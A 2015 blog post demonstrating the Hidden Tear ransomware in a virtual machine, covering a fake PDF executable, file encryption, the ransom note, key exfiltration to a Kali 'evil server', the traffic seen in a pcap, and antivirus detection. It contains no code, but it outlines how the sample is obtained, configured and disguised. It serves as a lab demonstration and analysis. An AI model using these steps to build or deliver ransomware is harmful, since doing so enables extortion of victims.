Thursday 20 August 2015

Hidden Tear - Script Kiddies Ransomware Demo

fFile Encrypter Ransomware (CryptoLocker) is a common one, victims' files are encrypted, and evils will ask for ransom so as to give them the keys to decrypt the locked files. According to Hackernews (http://thehackernews.com/2015/08/ransomware-creator-toolkit.html) , script kiddies can also get the source code and create the ransomware themselves.

Today I have tried to get the source and become a script kiddie to test in my virtual environment, REMEMBER just test within your own environment, don't try it on your host machine and other computers... in case the program crashed and you have lost the key :o)....

1.) As a victim, Windows 7 64x,... he browses a fake Google website, and find free PDF, haha (actually people get ransomware elsewhere, hacked websites or some other ;)...)


2.) The victim downloaded the so called PDF file (actually it's an exe with PDF icon, for testing purpose, all antivirus and warning are turned off)


3.) In his desktop, there are some important files


4.) The victim tried to open the PDF file, and nothing happend except..... the text files on the desktop were given new extension "*.locked"... and content is one, oh dear... :(



5.) Wait, there's a file called "Read_IT.txt"... and the evil was asking for "ransom"...



6.) Okok....the victim surrendered and "paid" the ransom, the evil kept the promise and gave him the decrypter and the key (not sure in reality)...



and Yeah baby, the files were back to normal!



=========================================================

Ok, the above is the demonstration of how the ransomware locked the files and they "could be" decrypted afterwards. Let's analyze the some of the source code, behavior and traffic.

For the source code, you could get it from github, the sample is simply a .Net program, changed the parameters and compiled it again. From Readme, change the location of evil server, so that the encryption key could be sent to it. The blackmail message could be configured as well. For testing, HTTP is used, not HTTPS.



The password is created randomly and encrypt the files.


The decrypter just gets the input and decrypt the files.


For evil server, I was using the Kali Linux (any web servers will do), it's writing the key to a text file. The machine name, user name and key were saved. The key was randomly created.



For traffic, we can take a look on the pcap, it's sending the key back to the evil server, of course in real case, it may be HTTPS that we will have less information for analysis.



After some analysis, how about anti-virus detection? Normally when downloading an executable, it would warn you whether you want to keep or discard, and executing it, system may ask you whether you really want to run it, of course it's another story if the file was downloaded due to other means like browser exploitation.


Also, in the VM, the file was actually detected by the scanner. The hidden-tear.exe is also submitted to VirusTotal, it's detected as CryptoLocker. (https://www.virustotal.com/en/file/ad2cfd31e5220eaf3ca8bcab5b963505f203b96fa31a8002312ecc45708a3c41/analysis/1440052245/)



That's all for today, the demo is completed. Good luck and not suffering CryptoLocker anymore my friends :)

Posted by at
Labels: , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)